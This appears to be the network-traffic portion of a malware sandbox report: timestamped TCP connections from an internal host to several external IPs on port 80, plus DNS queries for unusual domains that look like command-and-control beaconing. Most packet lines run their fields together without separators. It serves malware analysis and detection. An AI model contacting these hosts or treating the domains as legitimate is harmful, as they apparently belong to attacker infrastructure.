Nov 7, 2024 15:51:08.453764915 CET | 80 | 49982 | 168.76.221.252 | 192.168.2.10
Nov 7, 2024 15:51:09.559745073 CET | 49983 | 80 | 192.168.2.10 | 168.76.221.252
                                                        Nov 7, 2024 15:51:09.564760923 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:09.564825058 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:09.582758904 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:09.588490009 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:10.726788044 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:10.730227947 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:11.089446068 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:11.094633102 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:12.108218908 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:12.113295078 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:12.113400936 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:12.125232935 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:12.130072117 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:12.130207062 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:13.264903069 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:13.264976025 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:13.636290073 CET4998480192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:13.641295910 CET8049984168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:14.656702042 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:14.661895037 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:14.661963940 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:14.671600103 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:14.676496029 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:15.803564072 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:15.803730011 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:15.804616928 CET4998580192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:15.809443951 CET8049985168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:21.318948030 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:21.324022055 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:21.324084044 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:21.336498022 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:21.341458082 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.206223965 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.206278086 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.206439972 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:22.343616962 CET8049986150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:22.343703985 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:22.839349985 CET4998680192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:23.860290051 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:24.426707029 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:24.426780939 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:24.441174030 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:24.446156979 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.339709997 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.339797974 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.339847088 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:25.476057053 CET8049987150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:25.478274107 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:25.948823929 CET4998780192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.969407082 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.974569082 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:26.974651098 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.988409996 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:26.993581057 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:26.994313002 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:27.860903978 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:27.861690044 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:27.862210989 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:28.001315117 CET8049988150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:28.001436949 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:28.495554924 CET4998880192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.514875889 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.520102978 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:29.520320892 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.528069019 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:29.532963991 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.407376051 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.407434940 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.408169985 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:30.556338072 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:30.556457043 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:30.582427979 CET4998980192.168.2.10150.95.254.16
                                                        Nov 7, 2024 15:51:30.587539911 CET8049989150.95.254.16192.168.2.10
                                                        Nov 7, 2024 15:51:35.646147013 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:35.651088953 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:35.657006979 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:35.669001102 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:35.673995018 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:36.983582973 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:36.985105991 CET8049990188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:36.985157013 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:37.174236059 CET4999080192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.189097881 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.194206953 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:38.194653034 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.205995083 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:38.210808992 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:39.472732067 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:39.475511074 CET8049991188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:39.476120949 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:39.717299938 CET4999180192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.740813017 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.745832920 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:40.745940924 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.758377075 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:40.763587952 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:40.763613939 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.018539906 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.024770975 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.025674105 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:42.027348042 CET8049992188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:42.027410984 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:42.261100054 CET4999280192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.280191898 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.285244942 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:43.285399914 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.292861938 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:43.298760891 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:44.726872921 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:44.728554010 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:44.728604078 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:44.730565071 CET4999380192.168.2.10188.114.96.3
                                                        Nov 7, 2024 15:51:44.735380888 CET8049993188.114.96.3192.168.2.10
                                                        Nov 7, 2024 15:51:49.829989910 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:49.835994005 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:49.836186886 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:49.847692013 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:49.852720976 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:50.856875896 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:51.011004925 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:51.057271004 CET8049994103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:51.057399035 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:51.354872942 CET4999480192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.373806953 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.379689932 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:52.379792929 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.392051935 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:52.398080111 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.901726961 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.904449940 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.904738903 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.904947042 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.904962063 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.905050039 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.905050039 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.905735970 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.906642914 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:53.908565998 CET8049995103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:53.908993006 CET4999580192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.922003984 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.927048922 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:54.927124977 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.946218967 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:54.951283932 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:54.951308966 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:55.929886103 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:55.979856968 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:56.123006105 CET8049996103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:56.126030922 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:56.461958885 CET4999680192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.467231035 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.472229958 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:57.472527981 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.480072021 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:57.484987020 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:58.468180895 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:58.510867119 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:58.659259081 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:51:58.659372091 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:58.660423040 CET4999780192.168.2.10103.249.106.91
                                                        Nov 7, 2024 15:51:58.665652990 CET8049997103.249.106.91192.168.2.10
                                                        Nov 7, 2024 15:52:03.717875004 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:03.723042011 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:03.723990917 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:03.737556934 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:03.742439985 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770688057 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770894051 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770906925 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.770947933 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:04.771615028 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.771627903 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.771653891 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:04.772386074 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.772403002 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.772420883 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:04.773247004 CET8049998172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:04.773302078 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:05.245398045 CET4999880192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.264913082 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.269830942 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:06.272795916 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.283986092 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:06.288938999 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365489960 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365623951 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365634918 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.365669966 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.366060019 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366072893 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366097927 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.366951942 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366966009 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366976976 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.366991997 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.367012978 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.368405104 CET8049999172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:07.368453026 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:07.793842077 CET4999980192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.812886000 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.817939997 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:08.818018913 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.832688093 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:08.837702036 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:08.837866068 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870068073 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870471001 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870486021 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870606899 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:09.870893002 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870907068 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.870980978 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:09.871692896 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.871747971 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:09.872524023 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.872998953 CET8050000172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:09.873119116 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:10.341816902 CET5000080192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.358201981 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.364253044 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:11.364411116 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.373037100 CET5000180192.168.2.10172.67.202.10
                                                        Nov 7, 2024 15:52:11.379172087 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.409739971 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.409813881 CET8050001172.67.202.10192.168.2.10
                                                        Nov 7, 2024 15:52:12.409852028 CET8050001172.67.202.10192.168.2.10
Nov 7, 2024 15:52:12.410015106 CET | 50001 | 80 | 192.168.2.10 | 172.67.202.10
Nov 7, 2024 15:52:12.410378933 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.410394907 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.410531998 CET | 50001 | 80 | 192.168.2.10 | 172.67.202.10
Nov 7, 2024 15:52:12.411174059 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.411195993 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.411236048 CET | 50001 | 80 | 192.168.2.10 | 172.67.202.10
Nov 7, 2024 15:52:12.411969900 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.412015915 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.412162066 CET | 50001 | 80 | 192.168.2.10 | 172.67.202.10
Nov 7, 2024 15:52:12.412869930 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:12.413007975 CET | 50001 | 80 | 192.168.2.10 | 172.67.202.10
Nov 7, 2024 15:52:12.416930914 CET | 50001 | 80 | 192.168.2.10 | 172.67.202.10
Nov 7, 2024 15:52:12.421824932 CET | 80 | 50001 | 172.67.202.10 | 192.168.2.10
Nov 7, 2024 15:52:18.539352894 CET | 50002 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:18.545579910 CET | 80 | 50002 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:18.545661926 CET | 50002 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:18.563327074 CET | 50002 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:18.568875074 CET | 80 | 50002 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:19.725002050 CET | 80 | 50002 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:19.727330923 CET | 80 | 50002 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:19.727444887 CET | 50002 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:20.073348045 CET | 50002 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:21.093609095 CET | 50003 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:21.098925114 CET | 80 | 50003 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:21.099016905 CET | 50003 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:21.114036083 CET | 50003 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:21.119235039 CET | 80 | 50003 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:22.067702055 CET | 80 | 50003 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:22.121732950 CET | 50003 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:22.243813038 CET | 80 | 50003 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:22.244548082 CET | 50003 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:22.620419979 CET | 50003 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:23.640541077 CET | 50004 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:23.645621061 CET | 80 | 50004 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:23.648916006 CET | 50004 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:23.659780979 CET | 50004 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:23.664978027 CET | 80 | 50004 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:23.666728020 CET | 80 | 50004 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:24.672694921 CET | 80 | 50004 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:24.713799000 CET | 50004 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:24.796768904 CET | 80 | 50004 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:24.796823025 CET | 50004 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:25.167038918 CET | 50004 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:26.187026024 CET | 50005 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:26.192025900 CET | 80 | 50005 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:26.192178965 CET | 50005 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:26.199745893 CET | 50005 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:26.204946041 CET | 80 | 50005 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:27.156936884 CET | 80 | 50005 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:27.157059908 CET | 80 | 50005 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:27.157159090 CET | 50005 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:27.340441942 CET | 80 | 50005 | 156.234.28.94 | 192.168.2.10
Nov 7, 2024 15:52:27.340584040 CET | 50005 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:27.341494083 CET | 50005 | 80 | 192.168.2.10 | 156.234.28.94
Nov 7, 2024 15:52:27.346613884 CET | 80 | 50005 | 156.234.28.94 | 192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 15:50:15.095102072 CET | 56655 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:50:15.117604017 CET | 53 | 56655 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:50:20.192517996 CET | 62974 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:50:20.226219893 CET | 53 | 62974 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:50:37.187918901 CET | 62799 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:50:37.893816948 CET | 53 | 62799 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:50:51.578124046 CET | 51511 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:50:52.066457987 CET | 53 | 51511 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:51:06.437057972 CET | 62357 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:51:06.836339951 CET | 53 | 62357 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:51:20.812669992 CET | 55384 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:51:21.316452980 CET | 53 | 55384 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:51:35.597115993 CET | 63412 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:51:35.638514996 CET | 53 | 63412 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:51:49.749473095 CET | 63625 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:51:49.825793028 CET | 53 | 63625 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:52:03.671716928 CET | 49702 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:52:03.711690903 CET | 53 | 49702 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:52:17.420767069 CET | 57597 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:52:18.417372942 CET | 57597 | 53 | 192.168.2.10 | 1.1.1.1
Nov 7, 2024 15:52:18.536149025 CET | 53 | 57597 | 1.1.1.1 | 192.168.2.10
Nov 7, 2024 15:52:18.536604881 CET | 53 | 57597 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 15:50:15.095102072 CET | 192.168.2.10 | 1.1.1.1 | 0x5eda | Standard query (0) | www.mt2rahu.tech | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:20.192517996 CET | 192.168.2.10 | 1.1.1.1 | 0x9747 | Standard query (0) | www.lexjetcenter.net | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:37.187918901 CET | 192.168.2.10 | 1.1.1.1 | 0xc47e | Standard query (0) | www.elarac.top | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:51.578124046 CET | 192.168.2.10 | 1.1.1.1 | 0x3bf1 | Standard query (0) | www.budged.net | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:06.437057972 CET | 192.168.2.10 | 1.1.1.1 | 0x32d6 | Standard query (0) | www.5hdgb2p9a.buzz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:20.812669992 CET | 192.168.2.10 | 1.1.1.1 | 0xbe53 | Standard query (0) | www.j252mv.site | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:35.597115993 CET | 192.168.2.10 | 1.1.1.1 | 0x48f9 | Standard query (0) | www.lnnn.fun | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:49.749473095 CET | 192.168.2.10 | 1.1.1.1 | 0x8b0 | Standard query (0) | www.7153115.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:52:03.671716928 CET | 192.168.2.10 | 1.1.1.1 | 0xfed1 | Standard query (0) | www.tingba.sbs | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:52:17.420767069 CET | 192.168.2.10 | 1.1.1.1 | 0x7af9 | Standard query (0) | www.jllllbx.top | A (IP address) | IN (0x0001) | false
